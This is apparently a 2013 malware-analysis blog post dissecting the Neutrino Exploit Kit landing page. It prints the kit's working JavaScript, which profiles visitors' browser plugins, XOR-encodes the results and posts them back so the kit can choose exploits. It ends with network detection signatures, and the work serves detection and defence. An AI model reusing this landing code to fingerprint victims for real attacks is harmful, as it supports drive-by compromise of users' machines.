Sunday, March 31, 2013

Neutrino Exploit Kit landing page demystified


I finally got the time to look into the landing pane of Neutrino. Thanks to @malwaresigs and @kafeine for providing samples :)

What is this shiny new EK up to when it comes to the landing. I have only seen clear text versions so no deobfuscation needed.

Look here for a deeper analysis of "Neutrin Exploit Kit Analysis"

1. The landing


<!DOCTYPE HTML>
<html>
<head>
 <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> 
 <script type="text/javascript" src="scripts/js/plugin_detector.js"></script>
 <script type="text/javascript">
  $(document).ready(function() {
   qweqwewqe('515245e3aaa2cbaa2a00002b');
  });

  function qweqwewqe(hid) {
   var info = {
    plugins : {
     java: plg_all_vers('Java'),
     adobe_reader: plg_ver('AdobeReader'),
     flash: plg_ver('Flash'),
     quick_time: plg_ver('QuickTime'),
     real_player: plg_ver('RealPlayer'),
     shockwave: plg_ver('Shockwave'),
     silver_light: plg_ver('Silverlight'),
     vlc: plg_ver('VLC'),
     wmp: plg_ver('WMP')
    }
   }
      
   var pass = rnd_str(1+Math.floor(Math.random()*10));
   var obj = {};
   obj["h"+rnd_str(1+Math.floor(Math.random()*10))] = hid;      // host id
   obj["p"+rnd_str(1+Math.floor(Math.random()*10))] = pass;     // XOR pass
   obj["i"+rnd_str(1+Math.floor(Math.random()*10))] = kor(JSON.stringify(info), pass);
   
   $("body").load("c"+rnd_str(1+Math.floor(Math.random()*10)), obj);  
  }

  function plg_all_vers(name) {
   var info = PluginDetect.getInfo(name);
   var vers = info.All_versions;
   if(!vers)
    return '';
   return info.All_versions.join(';')
  }

  function plg_ver(name) {
   var info = PluginDetect.getVersion(name);
   return info;
  }
  
  function rnd_str(len) {
   len++;
   var result = [];
   var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
   while (--len) {
    result.push(chars.charAt(Math.floor(Math.random() * chars.length)));
   }
   return result.join('');
  }


  
  function kor(input, pass) {
   var output = "";
   var i = 0;
   var pos = 0;
   for (i = 0; i < input.length; i++){ 
     pos = Math.floor(i%pass.length);
     output += String.fromCharCode(input.charCodeAt(i) ^ pass.charCodeAt(pos));
   }
   return output;
  }

  JSON.stringify = JSON.stringify || function (obj) {
   var t = typeof (obj);
   if (t != "object" || obj === null) {
    // simple data type
    if (t == "string") obj = '"'+obj+'"';
    return String(obj);
   }
   else {
    // recurse array or object
    var n, v, json = [], arr = (obj && obj.constructor == Array);
    for (n in obj) {
     v = obj[n]; t = typeof(v);
     if (t == "string") v = '"'+v+'"';
     else if (t == "object" && v !== null) v = JSON.stringify(v);
     json.push((arr ? "" : '"' + n + '":') + String(v));
    }
    return (arr ? "[" : "{") + String(json) + (arr ? "]" : "}");
   }
  };


 </script> 
</head>
<body>
</body>
</html>

The Javascript is calling the function  qweqwewqe with som id(comment from the script syas host id), which we can see will be used to fetch JARs and the final payload. Link to @malwaresigs


Plugin detect is used to get the plugins from the client.

Variables are built:

//xor password generation:
 var pass = rnd_str(1+Math.floor(Math.random()*10));
 //@malforsec random string [a-z0-9]{1,10} 
//host id assigned:
 obj["h"+rnd_str(1+Math.floor(Math.random()*10))] = hid;                                  // host id 
 //@malforsec h +  [a-z0-9]{1,10}  = 515245e3aaa2cbaa2a00002b
//xor password assigned:
obj["p"+rnd_str(1+Math.floor(Math.random()*10))] = pass;                                 // XOR pass 
 //@malforsec p +  [a-z0-9]{1,10} = [a-z0-9]{1,10}
//plugin results xored; tostring and assigned:
obj["i"+rnd_str(1+Math.floor(Math.random()*10))] = kor(JSON.stringify(info), pass);
        // @malforsec i + [a-z0-9]{1,10} = XOR info with pass
//jquery to build the post:
 $("body").load("c"+rnd_str(1+Math.floor(Math.random()*10)), obj);              
        //@malforsec   c + [a-z0-9]{1,10},  obj


2. Debugger output

Browser plugin detection


Plugin detection string with XOR key and XORED PD string


Post request built


3. Wireshark output

POST request from captured with wireshark


4. Signatures

These patterns may vary or have changed - look here

POST request to /c[a-z0-9]{1,10}
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
h[a-z0-9]{1,10}=[a-f0-9]{24}
i[a-z0-9]{1,10}=.*
p[a-z0-9]{1,10}=[a-z0-9]{1,10}$
That should close it in pretty good :)

In addition we got som tip on how to get the different payloads out of the kit if we need to do that some day :)

Happy detecting Neutrino EK POST landing  

No comments:

Post a Comment